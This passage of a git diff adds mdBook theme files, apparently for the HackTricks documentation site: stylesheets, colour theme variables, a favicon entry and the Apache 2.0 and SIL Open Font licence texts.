+blockquote .warning:before {
+    background-color: var(--quote-bg);
+}
+
+kbd {
+    background-color: var(--table-border-color);
+    border-radius: 4px;
+    border: solid 1px var(--theme-popup-border);
+    box-shadow: inset 0 -1px 0 var(--theme-hover);
+    display: inline-block;
+    font-size: var(--code-font-size);
+    font-family: var(--mono-font);
+    line-height: 10px;
+    padding: 4px 5px;
+    vertical-align: middle;
+}
+
+sup {
+    /* Set the line-height for superscript and footnote references so that there
+       isn't an awkward space appearing above lines that contain the footnote.
+
+       See https://github.com/rust-lang/mdBook/pull/2443#discussion_r1813773583
+       for an explanation.
+    */
+    line-height: 0;
+}
+
+:not(.footnote-definition) + .footnote-definition,
+.footnote-definition + :not(.footnote-definition) {
+    margin-block-start: 2em;
+}
+.footnote-definition {
+    font-size: 0.9em;
+    margin: 0.5em 0;
+}
+.footnote-definition p {
+    display: inline;
+}
+
+.tooltiptext {
+    position: absolute;
+    visibility: hidden;
+    color: #fff;
+    background-color: #333;
+    transform: translateX(-50%); /* Center by moving tooltip 50% of its width left */
+    left:35%; /* Half of the width of the icon */
+    top: -35px;
+    font-size: 12px;
+    text-align: center;
+    border-radius: 6px;
+    padding: 5px 8px;
+    margin: 5px;
+    z-index: 1000;
+}
+.tooltipped .tooltiptext {
+    visibility: visible;
+}
+
+.result-no-output {
+    font-style: italic;
+}
\ No newline at end of file
diff --git a/theme/css/print.css b/theme/css/print.css
new file mode 100644
index 000000000..80ec3a544
--- /dev/null
+++ b/theme/css/print.css
@@ -0,0 +1,50 @@
+
+#sidebar,
+#menu-bar,
+.nav-chapters,
+.mobile-nav-chapters {
+    display: none;
+}
+
+#page-wrapper.page-wrapper {
+    transform: none !important;
+    margin-inline-start: 0px;
+    overflow-y: initial;
+}
+
+#content {
+    max-width: none;
+    margin: 0;
+    padding: 0;
+}
+
+.page {
+    overflow-y: initial;
+}
+
+code {
+    direction: ltr !important;
+}
+
+pre > .buttons {
+    z-index: 2;
+}
+
+a, a:visited, a:active, a:hover {
+    color: #4183c4;
+    text-decoration: none;
+}
+
+h1, h2, h3, h4, h5, h6 {
+    page-break-inside: avoid;
+    page-break-after: avoid;
+}
+
+pre, code {
+    page-break-inside: avoid;
+    white-space: pre-wrap;
+}
+
+.fa {
+    display: none !important;
+}
diff --git a/theme/css/variables.css b/theme/css/variables.css
new file mode 100644
index 000000000..fbe328e4d
--- /dev/null
+++ b/theme/css/variables.css
@@ -0,0 +1,484 @@
+
+/* Globals */
+
+:root {
+    --sidebar-width: 300px;
+    --sidebar-resize-indicator-width: 8px;
+    --sidebar-resize-indicator-space: 2px;
+    --page-padding: 15px;
+    --content-max-width: 750px;
+    --container-max-width: 1500px;
+    --menu-bar-height: 64px;
+    --footer-height: 75px;
+    --mono-font: "Source Code Pro", Consolas, "Ubuntu Mono", Menlo, "DejaVu Sans Mono", monospace, monospace;
+    --code-font-size: 0.875em /* please adjust the ace font size accordingly in editor.js */
+}
+
+/* Themes */
+
+.ayu {
+    --bg: hsl(210, 25%, 8%);
+    --fg: #c5c5c5;
+
+    --sidebar-bg: #14191f;
+    --sidebar-fg: #c8c9db;
+    --sidebar-non-existant: #5c6773;
+    --sidebar-active: #ffb454;
+    --sidebar-spacer: #2d334f;
+
+    --scrollbar: var(--sidebar-fg);
+
+    --icons: #737480;
+    --icons-hover: #b7b9cc;
+
+    --links: #0096cf;
+
+    --inline-code-color: #ffb454;
+
+    --theme-popup-bg: #14191f;
+    --theme-popup-border: #5c6773;
+    --theme-hover: #191f26;
+
+    --quote-bg: hsl(226, 15%, 17%);
+    --quote-border: hsl(226, 15%, 22%);
+
+    --warning-border: #ff8e00;
+
+    --table-border-color: hsl(210, 25%, 13%);
+    --table-header-bg: hsl(210, 25%, 28%);
+    --table-alternate-bg: hsl(210, 25%, 11%);
+
+    --searchbar-border-color: #848484;
+    --searchbar-bg: #424242;
+    --searchbar-fg: #fff;
+    --searchbar-shadow-color: #d4c89f;
+    --searchresults-header-fg: #666;
+    --searchresults-border-color: #888;
+    --searchresults-li-bg: #252932;
+    --search-mark-bg: #e3b171;
+
+    --color-scheme: dark;
+
+    /* Same as `--icons` */
+    --copy-button-filter: invert(45%) sepia(6%) saturate(621%) hue-rotate(198deg) brightness(99%) contrast(85%);
+    /* Same as `--sidebar-active` */
+    --copy-button-filter-hover: invert(68%) sepia(55%) saturate(531%) hue-rotate(341deg) brightness(104%) contrast(101%);
+}
+
+.coal {
+    --bg: hsl(200, 7%, 8%);
+    --fg: #98a3ad;
+
+    --sidebar-bg: #292c2f;
+    --sidebar-fg: #a1adb8;
+    --sidebar-non-existant: #505254;
+    --sidebar-active: #3473ad;
+    --sidebar-spacer: #393939;
+
+    --scrollbar: var(--sidebar-fg);
+
+    --icons: #43484d;
+    --icons-hover: #b3c0cc;
+
+    --links: #2b79a2;
+
+    --inline-code-color: #c5c8c6;
+
+    --theme-popup-bg: #141617;
+    --theme-popup-border: #43484d;
+    --theme-hover: #1f2124;
+
+    --quote-bg: hsl(234, 21%, 18%);
+    --quote-border: hsl(234, 21%, 23%);
+
+    --warning-border: #ff8e00;
+
+    --table-border-color: hsl(200, 7%, 13%);
+    --table-header-bg: hsl(200, 7%, 28%);
+    --table-alternate-bg: hsl(200, 7%, 11%);
+
+    --searchbar-border-color: #aaa;
+    --searchbar-bg: #b7b7b7;
+    --searchbar-fg: #000;
+    --searchbar-shadow-color: #aaa;
+    --searchresults-header-fg: #666;
+    --searchresults-border-color: #98a3ad;
+    --searchresults-li-bg: #2b2b2f;
+    --search-mark-bg: #355c7d;
+
+    --color-scheme: dark;
+
+    /* Same as `--icons` */
+    --copy-button-filter: invert(26%) sepia(8%) saturate(575%) hue-rotate(169deg) brightness(87%) contrast(82%);
+    /* Same as `--sidebar-active` */
+    --copy-button-filter-hover: invert(36%) sepia(70%) saturate(503%) hue-rotate(167deg) brightness(98%) contrast(89%);
+}
+
+.light, html:not(.js) {
+    --bg: hsl(0, 0%, 100%);
+    --fg: hsl(0, 0%, 0%);
+
+    --sidebar-bg: #fafafa;
+    --sidebar-fg: hsl(0, 0%, 0%);
+    --sidebar-non-existant: #aaaaaa;
+    --sidebar-active: #1f1fff;
+    --sidebar-spacer: #f4f4f4;
+
+    --scrollbar: #8F8F8F;
+
+    --icons: #747474;
+    --icons-hover: #000000;
+
+    --links: #20609f;
+
+    --inline-code-color: #301900;
+
+    --theme-popup-bg: #fafafa;
+    --theme-popup-border: #cccccc;
+    --theme-hover: #e6e6e6;
+
+    --quote-bg: hsl(197, 37%, 96%);
+    --quote-border: hsl(197, 37%, 91%);
+
+    --warning-border: #ff8e00;
+
+    --table-border-color: hsl(0, 0%, 95%);
+    --table-header-bg: hsl(0, 0%, 80%);
+    --table-alternate-bg: hsl(0, 0%, 97%);
+
+    --searchbar-border-color: #aaa;
+    --searchbar-bg: #fafafa;
+    --searchbar-fg: #000;
+    --searchbar-shadow-color: #aaa;
+    --searchresults-header-fg: #666;
+    --searchresults-border-color: #888;
+    --searchresults-li-bg: #e4f2fe;
+    --search-mark-bg: #a2cff5;
+
+    --color-scheme: light;
+
+    /* Same as `--icons` */
+    --copy-button-filter: invert(45.49%);
+    /* Same as `--sidebar-active` */
+    --copy-button-filter-hover: invert(14%) sepia(93%) saturate(4250%) hue-rotate(243deg) brightness(99%) contrast(130%);
+}
+
+.navy {
+    --bg: hsl(226, 23%, 11%);
+    --fg: #bcbdd0;
+
+    --sidebar-bg: #282d3f;
+    --sidebar-fg: #c8c9db;
+    --sidebar-non-existant: #505274;
+    --sidebar-active: #2b79a2;
+    --sidebar-spacer: #2d334f;
+
+    --scrollbar: var(--sidebar-fg);
+
+    --icons: #737480;
+    --icons-hover: #b7b9cc;
+
+    --links: #2b79a2;
+
+    --inline-code-color: #c5c8c6;
+
+    --theme-popup-bg: #161923;
+    --theme-popup-border: #737480;
+    --theme-hover: #282e40;
+
+    --quote-bg: hsl(226, 15%, 17%);
+    --quote-border: hsl(226, 15%, 22%);
+
+    --warning-border: #ff8e00;
+
+    --table-border-color: hsl(226, 23%, 16%);
+    --table-header-bg: hsl(226, 23%, 31%);
+    --table-alternate-bg: hsl(226, 23%, 14%);
+
+    --searchbar-border-color: #aaa;
+    --searchbar-bg: #aeaec6;
+    --searchbar-fg: #000;
+    --searchbar-shadow-color: #aaa;
+    --searchresults-header-fg: #5f5f71;
+    --searchresults-border-color: #5c5c68;
+    --searchresults-li-bg: #242430;
+    --search-mark-bg: #a2cff5;
+
+    --color-scheme: dark;
+
+    /* Same as `--icons` */
+    --copy-button-filter: invert(51%) sepia(10%) saturate(393%) hue-rotate(198deg) brightness(86%) contrast(87%);
+    /* Same as `--sidebar-active` */
+    --copy-button-filter-hover: invert(46%) sepia(20%) saturate(1537%) hue-rotate(156deg) brightness(85%) contrast(90%);
+}
+
+.rust {
+    --bg: hsl(60, 9%, 87%);
+    --fg: #262625;
+
+    --sidebar-bg: #3b2e2a;
+    --sidebar-fg: #c8c9db;
+    --sidebar-non-existant: #505254;
+    --sidebar-active: #e69f67;
+    --sidebar-spacer: #45373a;
+
+    --scrollbar: var(--sidebar-fg);
+
+    --icons: #737480;
+    --icons-hover: #262625;
+
+    --links: #2b79a2;
+
+    --inline-code-color: #6e6b5e;
+
+    --theme-popup-bg: #e1e1db;
+    --theme-popup-border: #b38f6b;
+    --theme-hover: #99908a;
+
+    --quote-bg: hsl(60, 5%, 75%);
+    --quote-border: hsl(60, 5%, 70%);
+
+    --warning-border: #ff8e00;
+
+    --table-border-color: hsl(60, 9%, 82%);
+    --table-header-bg: #b3a497;
+    --table-alternate-bg: hsl(60, 9%, 84%);
+
+    --searchbar-border-color: #aaa;
+    --searchbar-bg: #fafafa;
+    --searchbar-fg: #000;
+    --searchbar-shadow-color: #aaa;
+    --searchresults-header-fg: #666;
+    --searchresults-border-color: #888;
+    --searchresults-li-bg: #dec2a2;
+    --search-mark-bg: #e69f67;
+
+    /* Same as `--icons` */
+    --copy-button-filter: invert(51%) sepia(10%) saturate(393%) hue-rotate(198deg) brightness(86%) contrast(87%);
+    /* Same as `--sidebar-active` */
+    --copy-button-filter-hover: invert(77%) sepia(16%) saturate(1798%) hue-rotate(328deg) brightness(98%) contrast(83%);
+}
+
+@media (prefers-color-scheme: dark) {
+    html:not(.js) {
+        --bg: hsl(200, 7%, 8%);
+        --fg: #98a3ad;
+
+        --sidebar-bg: #292c2f;
+        --sidebar-fg: #a1adb8;
+        --sidebar-non-existant: #505254;
+        --sidebar-active: #3473ad;
+        --sidebar-spacer: #393939;
+
+        --scrollbar: var(--sidebar-fg);
+
+        --icons: #43484d;
+        --icons-hover: #b3c0cc;
+
+        --links: #2b79a2;
+
+        --inline-code-color: #c5c8c6;
+
+        --theme-popup-bg: #141617;
+        --theme-popup-border: #43484d;
+        --theme-hover: #1f2124;
+
+        --quote-bg: hsl(234, 21%, 18%);
+        --quote-border: hsl(234, 21%, 23%);
+
+        --warning-border: #ff8e00;
+
+        --table-border-color: hsl(200, 7%, 13%);
+        --table-header-bg: hsl(200, 7%, 28%);
+        --table-alternate-bg: hsl(200, 7%, 11%);
+
+        --searchbar-border-color: #aaa;
+        --searchbar-bg: #b7b7b7;
+        --searchbar-fg: #000;
+        --searchbar-shadow-color: #aaa;
+        --searchresults-header-fg: #666;
+        --searchresults-border-color: #98a3ad;
+        --searchresults-li-bg: #2b2b2f;
+        --search-mark-bg: #355c7d;
+
+        --color-scheme: dark;
+
+        /* Same as `--icons` */
+        --copy-button-filter: invert(26%) sepia(8%) saturate(575%) hue-rotate(169deg) brightness(87%) contrast(82%);
+        /* Same as `--sidebar-active` */
+        --copy-button-filter-hover: invert(36%) sepia(70%) saturate(503%) hue-rotate(167deg) brightness(98%) contrast(89%);
+    }
+}
+
+.hacktricks-dark {
+    --bg: hsl(0, 0%, 11%);
+    --fg: #ffffff;
+
+    --menu-bar-link-color: #b8b8b8;
+    --menu-bar-link-color-hover: #ffffff;
+
+    --sidebar-bg: hsl(0, 0%, 11%);
+    --sidebar-bg-hover: #2f2f2f;
+    --sidebar-fg: #c0c0c0;
+    --sidebar-non-existant: #505274;
+    --sidebar-active: #496dff;
+    --sidebar-spacer: #2d334f;
+
+    --scrollbar: var(--sidebar-fg);
+
+    --icons: #ffffff;
+    --icons-hover: #b7b9cc;
+
+    --links: #496dff;
+
+    --inline-code-color: #c5c8c6;
+
+    --theme-popup-bg: #161923;
+    --theme-popup-border: #737480;
+    --theme-hover: #2f2f2f;
+
+    --quote-bg: hsl(226, 15%, 17%);
+    --quote-border: hsl(226, 15%, 22%);
+
+    --warning-border: #ff8e00;
+
+    --table-border-color: #2f2f2f;
+    --table-header-bg: hsl(226, 23%, 31%);
+    --table-alternate-bg: hsl(226, 23%, 14%);
+
+    --searchbar-border-color: #2f2f2f;
+    --searchbar-bg: hsl(0, 0%, 11%);
+    --searchbar-fg: #ffffff;
+    --searchbar-shadow-color: #aaa;
+    --searchresults-header-fg: #b7b9cc;
+    --searchresults-border-color: #2f2f2f;
+    --searchresults-li-bg: hsl(0, 0%, 11%);
+    --search-mark-bg: #a2cff5;
+
+    --sponsor-fg: #cfcdcd;
+
+    --color-scheme: dark;
+
+    /* Same as `--icons` */
+    --copy-button-filter: invert(51%) sepia(10%) saturate(393%) hue-rotate(198deg) brightness(86%) contrast(87%);
+    /* Same as `--sidebar-active` */
+    --copy-button-filter-hover: invert(46%) sepia(20%) saturate(1537%) hue-rotate(156deg) brightness(85%) contrast(90%);
+
+    .mdbook-alerts-note {
+        --mdbook-alerts-color: rgba(1, 1, 1, 0.04) !important;
+        --mdbook-alerts-color-link: rgb(73, 109, 255) !important;
+        --mdbook-alerts-color-link-hover: rgb(112, 139, 250) !important;
+    }
+      
+    .mdbook-alerts-tip {
+        --mdbook-alerts-color: rgba(34, 197, 94, 0.08) !important;
+        --mdbook-alerts-color-link: rgb(74 222 128) !important;
+        --mdbook-alerts-color-link-hover: rgb(134 239 172) !important;
+    }
+      
+    .mdbook-alerts-important {
+        --mdbook-alerts-color: rgb(130, 80, 223) !important;
+        --mdbook-alerts-color-link: rgb(130, 80, 223) !important;
+        --mdbook-alerts-color-link-hover: rgb(130, 80, 223) !important;
+    }
+      
+    .mdbook-alerts-warning {
+        --mdbook-alerts-color: rgba(249, 115, 22, 0.08) !important;
+        --mdbook-alerts-color-link: rgba(249, 115, 22, 0.08) !important;
+        --mdbook-alerts-color-link-hover: rgba(249, 115, 22, 0.08) !important;
+    }
+      
+    .mdbook-alerts-caution {
+        --mdbook-alerts-color: rgba(239, 68, 68, 0.08) !important;
+        --mdbook-alerts-color-link: rgb(248 113 113) !important;
+        --mdbook-alerts-color-link-hover: rgb(252 165 165) !important;
+    }
+
+}
+
+.hacktricks-light {
+    --bg: hsl(0, 0%, 100%);
+    --fg: hsl(0, 0%, 0%);
+
+    --menu-bar-link-color: #747474;
+    --menu-bar-link-color-hover: #000000;
+
+    --sidebar-bg: #fff;
+    --sidebar-bg-hover: ##f6f6f6;
+    --sidebar-fg: hsl(0, 0%, 0%);
+    --sidebar-non-existant: #aaaaaa;
+    --sidebar-active: #496dff;
+    --sidebar-spacer: #f4f4f4;
+
+    --scrollbar: #8F8F8F;
+
+    --icons: #747474;
+    --icons-hover: #000000;
+
+    --links: #496dff;
+
+    --inline-code-color: #301900;
+
+    --theme-popup-bg: #fafafa;
+    --theme-popup-border: #cccccc;
+    --theme-hover: ##f6f6f6;
+
+    --quote-bg: hsl(197, 37%, 96%);
+    --quote-border: hsl(197, 37%, 91%);
+
+    --warning-border: #ff8e00;
+
+    --table-border-color: hsl(0, 0%, 95%);
+    --table-header-bg: hsl(0, 0%, 80%);
+    --table-alternate-bg: hsl(0, 0%, 97%);
+
+    --searchbar-border-color: #aaa;
+    --searchbar-bg: #fafafa;
+    --searchbar-fg: #000;
+    --searchbar-shadow-color: #aaa;
+    --searchresults-header-fg: #666;
+    --searchresults-border-color: #888;
+    --searchresults-li-bg: #e4f2fe;
+    --search-mark-bg: #a2cff5;
+
+    --sponsor-fg: #333333;
+
+    --color-scheme: light;
+
+    /* Same as `--icons` */
+    --copy-button-filter: invert(45.49%);
+    /* Same as `--sidebar-active` */
+    --copy-button-filter-hover: invert(14%) sepia(93%) saturate(4250%) hue-rotate(243deg) brightness(99%) contrast(130%);
+
+
+    
+    .mdbook-alerts-note {
+        --mdbook-alerts-color: rgba(0.098353, 0.098353, 0.098353, 0.04) !important;
+        --mdbook-alerts-color-link: rgb(9, 105, 218) !important;
+        --mdbook-alerts-color-link-hover: rgb(9, 105, 218) !important;
+    }
+      
+    .mdbook-alerts-tip {
+        --mdbook-alerts-color: rgba(34, 197, 94, 0.08) !important;
+        --mdbook-alerts-color-link: rgb(22 101 52) !important;
+        --mdbook-alerts-color-link-hover: rgb(20 83 45) !important;
+    }
+      
+    .mdbook-alerts-important {
+        --mdbook-alerts-color: rgb(130, 80, 223) !important;
+        --mdbook-alerts-color-link: rgb(130, 80, 223) !important;
+        --mdbook-alerts-color-link-hover: rgb(130, 80, 223) !important;
+    }
+      
+    .mdbook-alerts-warning {
+        --mdbook-alerts-color: rgba(249, 115, 22, 0.08) !important;
+        --mdbook-alerts-color-link: rgba(249, 115, 22, 0.08) !important;
+        --mdbook-alerts-color-link-hover: rgba(249, 115, 22, 0.08) !important;
+    }
+      
+    .mdbook-alerts-caution {
+        --mdbook-alerts-color: rgba(239, 68, 68, 0.08) !important;
+        --mdbook-alerts-color-link: rgb(153 27 27) !important;
+        --mdbook-alerts-color-link-hover: rgb(127 29 29) !important;
+    }
+}
\ No newline at end of file
diff --git a/theme/favicon.png b/theme/favicon.png
new file mode 100644
index 000000000..1671d0bf8
Binary files /dev/null and b/theme/favicon.png differ
diff --git a/theme/favicon.svg b/theme/favicon.svg
new file mode 100644
index 000000000..3cd2d0ee8
--- /dev/null
+++ b/theme/favicon.svg
@@ -0,0 +1,21 @@
+
+
+  
+    
+    
+      
+      
+      
+      
+      
+      
+      
+      
+    
+  
+  
+
\ No newline at end of file
diff --git a/theme/fonts/OPEN-SANS-LICENSE.txt b/theme/fonts/OPEN-SANS-LICENSE.txt
new file mode 100644
index 000000000..d64569567
--- /dev/null
+++ b/theme/fonts/OPEN-SANS-LICENSE.txt
@@ -0,0 +1,202 @@
+
+                                 Apache License
+                           Version 2.0, January 2004
+                        http://www.apache.org/licenses/
+
+   TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION
+
+   1. Definitions.
+
+      "License" shall mean the terms and conditions for use, reproduction,
+      and distribution as defined by Sections 1 through 9 of this document.
+
+      "Licensor" shall mean the copyright owner or entity authorized by
+      the copyright owner that is granting the License.
+
+      "Legal Entity" shall mean the union of the acting entity and all
+      other entities that control, are controlled by, or are under common
+      control with that entity. For the purposes of this definition,
+      "control" means (i) the power, direct or indirect, to cause the
+      direction or management of such entity, whether by contract or
+      otherwise, or (ii) ownership of fifty percent (50%) or more of the
+      outstanding shares, or (iii) beneficial ownership of such entity.
+
+      "You" (or "Your") shall mean an individual or Legal Entity
+      exercising permissions granted by this License.
+
+      "Source" form shall mean the preferred form for making modifications,
+      including but not limited to software source code, documentation
+      source, and configuration files.
+
+      "Object" form shall mean any form resulting from mechanical
+      transformation or translation of a Source form, including but
+      not limited to compiled object code, generated documentation,
+      and conversions to other media types.
+
+      "Work" shall mean the work of authorship, whether in Source or
+      Object form, made available under the License, as indicated by a
+      copyright notice that is included in or attached to the work
+      (an example is provided in the Appendix below).
+
+      "Derivative Works" shall mean any work, whether in Source or Object
+      form, that is based on (or derived from) the Work and for which the
+      editorial revisions, annotations, elaborations, or other modifications
+      represent, as a whole, an original work of authorship. For the purposes
+      of this License, Derivative Works shall not include works that remain
+      separable from, or merely link (or bind by name) to the interfaces of,
+      the Work and Derivative Works thereof.
+
+      "Contribution" shall mean any work of authorship, including
+      the original version of the Work and any modifications or additions
+      to that Work or Derivative Works thereof, that is intentionally
+      submitted to Licensor for inclusion in the Work by the copyright owner
+      or by an individual or Legal Entity authorized to submit on behalf of
+      the copyright owner. For the purposes of this definition, "submitted"
+      means any form of electronic, verbal, or written communication sent
+      to the Licensor or its representatives, including but not limited to
+      communication on electronic mailing lists, source code control systems,
+      and issue tracking systems that are managed by, or on behalf of, the
+      Licensor for the purpose of discussing and improving the Work, but
+      excluding communication that is conspicuously marked or otherwise
+      designated in writing by the copyright owner as "Not a Contribution."
+
+      "Contributor" shall mean Licensor and any individual or Legal Entity
+      on behalf of whom a Contribution has been received by Licensor and
+      subsequently incorporated within the Work.
+
+   2. Grant of Copyright License. Subject to the terms and conditions of
+      this License, each Contributor hereby grants to You a perpetual,
+      worldwide, non-exclusive, no-charge, royalty-free, irrevocable
+      copyright license to reproduce, prepare Derivative Works of,
+      publicly display, publicly perform, sublicense, and distribute the
+      Work and such Derivative Works in Source or Object form.
+
+   3. Grant of Patent License. Subject to the terms and conditions of
+      this License, each Contributor hereby grants to You a perpetual,
+      worldwide, non-exclusive, no-charge, royalty-free, irrevocable
+      (except as stated in this section) patent license to make, have made,
+      use, offer to sell, sell, import, and otherwise transfer the Work,
+      where such license applies only to those patent claims licensable
+      by such Contributor that are necessarily infringed by their
+      Contribution(s) alone or by combination of their Contribution(s)
+      with the Work to which such Contribution(s) was submitted. If You
+      institute patent litigation against any entity (including a
+      cross-claim or counterclaim in a lawsuit) alleging that the Work
+      or a Contribution incorporated within the Work constitutes direct
+      or contributory patent infringement, then any patent licenses
+      granted to You under this License for that Work shall terminate
+      as of the date such litigation is filed.
+
+   4. Redistribution. You may reproduce and distribute copies of the
+      Work or Derivative Works thereof in any medium, with or without
+      modifications, and in Source or Object form, provided that You
+      meet the following conditions:
+
+      (a) You must give any other recipients of the Work or
+          Derivative Works a copy of this License; and
+
+      (b) You must cause any modified files to carry prominent notices
+          stating that You changed the files; and
+
+      (c) You must retain, in the Source form of any Derivative Works
+          that You distribute, all copyright, patent, trademark, and
+          attribution notices from the Source form of the Work,
+          excluding those notices that do not pertain to any part of
+          the Derivative Works; and
+
+      (d) If the Work includes a "NOTICE" text file as part of its
+          distribution, then any Derivative Works that You distribute must
+          include a readable copy of the attribution notices contained
+          within such NOTICE file, excluding those notices that do not
+          pertain to any part of the Derivative Works, in at least one
+          of the following places: within a NOTICE text file distributed
+          as part of the Derivative Works; within the Source form or
+          documentation, if provided along with the Derivative Works; or,
+          within a display generated by the Derivative Works, if and
+          wherever such third-party notices normally appear. The contents
+          of the NOTICE file are for informational purposes only and
+          do not modify the License. You may add Your own attribution
+          notices within Derivative Works that You distribute, alongside
+          or as an addendum to the NOTICE text from the Work, provided
+          that such additional attribution notices cannot be construed
+          as modifying the License.
+
+      You may add Your own copyright statement to Your modifications and
+      may provide additional or different license terms and conditions
+      for use, reproduction, or distribution of Your modifications, or
+      for any such Derivative Works as a whole, provided Your use,
+      reproduction, and distribution of the Work otherwise complies with
+      the conditions stated in this License.
+
+   5. Submission of Contributions. Unless You explicitly state otherwise,
+      any Contribution intentionally submitted for inclusion in the Work
+      by You to the Licensor shall be under the terms and conditions of
+      this License, without any additional terms or conditions.
+      Notwithstanding the above, nothing herein shall supersede or modify
+      the terms of any separate license agreement you may have executed
+      with Licensor regarding such Contributions.
+
+   6. Trademarks. This License does not grant permission to use the trade
+      names, trademarks, service marks, or product names of the Licensor,
+      except as required for reasonable and customary use in describing the
+      origin of the Work and reproducing the content of the NOTICE file.
+
+   7. Disclaimer of Warranty. Unless required by applicable law or
+      agreed to in writing, Licensor provides the Work (and each
+      Contributor provides its Contributions) on an "AS IS" BASIS,
+      WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
+      implied, including, without limitation, any warranties or conditions
+      of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A
+      PARTICULAR PURPOSE. You are solely responsible for determining the
+      appropriateness of using or redistributing the Work and assume any
+      risks associated with Your exercise of permissions under this License.
+
+   8. Limitation of Liability. In no event and under no legal theory,
+      whether in tort (including negligence), contract, or otherwise,
+      unless required by applicable law (such as deliberate and grossly
+      negligent acts) or agreed to in writing, shall any Contributor be
+      liable to You for damages, including any direct, indirect, special,
+      incidental, or consequential damages of any character arising as a
+      result of this License or out of the use or inability to use the
+      Work (including but not limited to damages for loss of goodwill,
+      work stoppage, computer failure or malfunction, or any and all
+      other commercial damages or losses), even if such Contributor
+      has been advised of the possibility of such damages.
+
+   9. Accepting Warranty or Additional Liability. While redistributing
+      the Work or Derivative Works thereof, You may choose to offer,
+      and charge a fee for, acceptance of support, warranty, indemnity,
+      or other liability obligations and/or rights consistent with this
+      License. However, in accepting such obligations, You may act only
+      on Your own behalf and on Your sole responsibility, not on behalf
+      of any other Contributor, and only if You agree to indemnify,
+      defend, and hold each Contributor harmless for any liability
+      incurred by, or claims asserted against, such Contributor by reason
+      of your accepting any such warranty or additional liability.
+
+   END OF TERMS AND CONDITIONS
+
+   APPENDIX: How to apply the Apache License to your work.
+
+      To apply the Apache License to your work, attach the following
+      boilerplate notice, with the fields enclosed by brackets "[]"
+      replaced with your own identifying information. (Don't include
+      the brackets!)  The text should be enclosed in the appropriate
+      comment syntax for the file format. We also recommend that a
+      file or class name and description of purpose be included on the
+      same "printed page" as the copyright notice for easier
+      identification within third-party archives.
+
+   Copyright [yyyy] [name of copyright owner]
+
+   Licensed under the Apache License, Version 2.0 (the "License");
+   you may not use this file except in compliance with the License.
+   You may obtain a copy of the License at
+
+       http://www.apache.org/licenses/LICENSE-2.0
+
+   Unless required by applicable law or agreed to in writing, software
+   distributed under the License is distributed on an "AS IS" BASIS,
+   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+   See the License for the specific language governing permissions and
+   limitations under the License.
diff --git a/theme/fonts/SOURCE-CODE-PRO-LICENSE.txt b/theme/fonts/SOURCE-CODE-PRO-LICENSE.txt
new file mode 100644
index 000000000..366206f54
--- /dev/null
+++ b/theme/fonts/SOURCE-CODE-PRO-LICENSE.txt
@@ -0,0 +1,93 @@
+Copyright 2010, 2012 Adobe Systems Incorporated (http://www.adobe.com/), with Reserved Font Name 'Source'. All Rights Reserved. Source is a trademark of Adobe Systems Incorporated in the United States and/or other countries.
+
+This Font Software is licensed under the SIL Open Font License, Version 1.1.
+This license is copied below, and is also available with a FAQ at:
+http://scripts.sil.org/OFL
+
+
+-----------------------------------------------------------
+SIL OPEN FONT LICENSE Version 1.1 - 26 February 2007
+-----------------------------------------------------------
+
+PREAMBLE
+The goals of the Open Font License (OFL) are to stimulate worldwide
+development of collaborative font projects, to support the font creation
+efforts of academic and linguistic communities, and to provide a free and
+open framework in which fonts may be shared and improved in partnership
+with others.
+
+The OFL allows the licensed fonts to be used, studied, modified and
+redistributed freely as long as they are not sold by themselves. The
+fonts, including any derivative works, can be bundled, embedded, 
+redistributed and/or sold with any software provided that any reserved
+names are not used by derivative works. The fonts and derivatives,
+however, cannot be released under any other type of license. The
+requirement for fonts to remain under this license does not apply
+to any document created using the fonts or their derivatives.
+
+DEFINITIONS
+"Font Software" refers to the set of files released by the Copyright
+Holder(s) under this license and clearly marked as such. This may
+include source files, build scripts and documentation.
+
+"Reserved Font Name" refers to any names specified as such after the
+copyright statement(s).
+
+"Original Version" refers to the collection of Font Software components as
+distributed by the Copyright Holder(s).
+
+"Modified Version" refers to any derivative made by adding to, deleting,
+or substituting -- in part or in whole -- any of the components of the
+Original Version, by changing formats or by porting the Font Software to a
+new environment.
+
+"Author" refers to any designer, engineer, programmer, technical
+writer or other person who contributed to the Font Software.
+
+PERMISSION & CONDITIONS
+Permission is hereby granted, free of charge, to any person obtaining
+a copy of the Font Software, to use, study, copy, merge, embed, modify,
+redistribute, and sell modified and unmodified copies of the Font
+Software, subject to the following conditions:
+
+1) Neither the Font Software nor any of its individual components,
+in Original or Modified Versions, may be sold by itself.
+
+2) Original or Modified Versions of the Font Software may be bundled,
+redistributed and/or sold with any software, provided that each copy
+contains the above copyright notice and this license. These can be
+included either as stand-alone text files, human-readable headers or
+in the appropriate machine-readable metadata fields within text or
+binary files as long as those fields can be easily viewed by the user.
+
+3) No Modified Version of the Font Software may use the Reserved Font
+Name(s) unless explicit written permission is granted by the corresponding
+Copyright Holder. This restriction only applies to the primary font name as
+presented to the users.
+
+4) The name(s) of the Copyright Holder(s) or the Author(s) of the Font
+Software shall not be used to promote, endorse or advertise any
+Modified Version, except to acknowledge the contribution(s) of the
+Copyright Holder(s) and the Author(s) or with their explicit written
+permission.
+
+5) The Font Software, modified or unmodified, in part or in whole,
+must be distributed entirely under this license, and must not be
+distributed under any other license. The requirement for fonts to
+remain under this license does not apply to any document created
+using the Font Software.
+
+TERMINATION
+This license becomes null and void if any of the above conditions are
+not met.
+
+DISCLAIMER
+THE FONT SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
+EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO ANY WARRANTIES OF
+MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT
+OF COPYRIGHT, PATENT, TRADEMARK, OR OTHER RIGHT. IN NO EVENT SHALL THE
+COPYRIGHT HOLDER BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
+INCLUDING ANY GENERAL, SPECIAL, INDIRECT, INCIDENTAL, OR CONSEQUENTIAL
+DAMAGES, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
+FROM, OUT OF THE USE OR INABILITY TO USE THE FONT SOFTWARE OR FROM
+OTHER DEALINGS IN THE FONT SOFTWARE.
diff --git a/theme/fonts/fonts.css b/theme/fonts/fonts.css
new file mode 100644
index 000000000..858efa598
--- /dev/null
+++ b/theme/fonts/fonts.css
@@ -0,0 +1,100 @@
